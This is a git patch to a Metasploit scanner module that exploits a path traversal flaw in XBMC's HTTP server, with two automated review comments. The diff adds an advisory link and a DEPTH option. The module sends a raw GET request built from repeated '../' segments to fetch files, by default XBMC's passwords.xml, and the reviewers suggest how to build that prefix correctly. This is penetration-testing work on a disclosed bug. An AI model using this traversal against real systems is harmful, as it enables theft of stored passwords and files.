From 2cdeca54225b092ee508bf9043b6fec2dcbb69d5 Mon Sep 17 00:00:00 2001
From: Matt Andreko
Date: Tue, 5 Feb 2013 14:32:50 -0500
Subject: [PATCH] Added reference & depth

Added reference to IOActive's release. Added a depth option to allow user to specify how many folders to traverse.
---
 modules/auxiliary/scanner/http/xbmc_traversal.rb | 4 +++-
 1 file changed, 3 insertions(+), 1 deletion(-)

diff --git a/modules/auxiliary/scanner/http/xbmc_traversal.rb b/modules/auxiliary/scanner/http/xbmc_traversal.rb
index 2828421109..2f43b36077 100644
--- a/modules/auxiliary/scanner/http/xbmc_traversal.rb
+++ b/modules/auxiliary/scanner/http/xbmc_traversal.rb
@@ -31,6 +31,7 @@ class Metasploit3 < Msf::Auxiliary
 [
 ['URL', 'http://forum.xbmc.org/showthread.php?tid=144110&pid=1227348'],
 ['URL', 'https://github.com/xbmc/xbmc/commit/bdff099c024521941cb0956fe01d99ab52a65335'],
+ ['URL', 'http://www.ioactive.com/pdfs/Security_Advisory_XBMC.pdf'],
 ],
 'DisclosureDate' => "Nov 4 2012"
 ))
@@ -39,6 +40,7 @@ class Metasploit3 < Msf::Auxiliary
 [
 Opt::RPORT(8080),
 OptString.new('FILEPATH', [false, 'The name of the file to download', '/private/var/mobile/Library/Preferences/XBMC/userdata/passwords.xml']),
+ OptInt.new('DEPTH', [true, 'The max traversal depth', 9]),
 OptString.new('USER', [true, 'The username to use for the HTTP server', 'xbmc']),
 OptString.new('PASS', [true, 'The password to use for the HTTP server', 'xbmc']),
 ], self.class)
@@ -54,7 +56,7 @@ class Metasploit3 < Msf::Auxiliary
 end
 
 # Create request
- traversal = "../../../../../../../../.." #The longest of all platforms tested was 9 deep
+ traversal = "../" * datastore['DEPTH'] #The longest of all platforms tested was 9 deep
 res = send_request_raw({
 'method' => 'GET',
 'uri' => "/#{traversal}/#{datastore['FILEPATH']}",
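Review bot: The description `'The max traversal depth'` on the new DEPTH option (hunk @@ -39,6 +40,7 @@) does not match how the value is used. The later hunk (@@ -54,7 +56,7 @@) sends exactly DEPTH `../` segments in a single request; nothing visible iterates up to a maximum. A description such as `'Number of ../ segments to prepend (9 was the deepest needed on the platforms tested)'` tells the operator what the setting actually controls, and records why 9 is the default.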
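Review bot: `"../" * datastore['DEPTH']` in hunk @@ -54,7 +56,7 @@ uses the option without a range check: String#* raises ArgumentError for a negative count, and 0 silently produces a request with no traversal prefix at all. The new expression also ends in a slash where the old literal ended in `..`, so the URI built two lines further down gains an extra `/` compared with the request the author tested. I would read the option once as `depth = datastore['DEPTH'].to_i`, bail out with `print_error` when `depth < 1`, and build the prefix as `traversal = (['..'] * depth).join('/')` so the default of 9 reproduces the old string exactly. The trailing comment about 9 being the deepest platform now describes the option's default rather than this line and reads better next to the option definition. The enclosing method starts and ends outside the hunk.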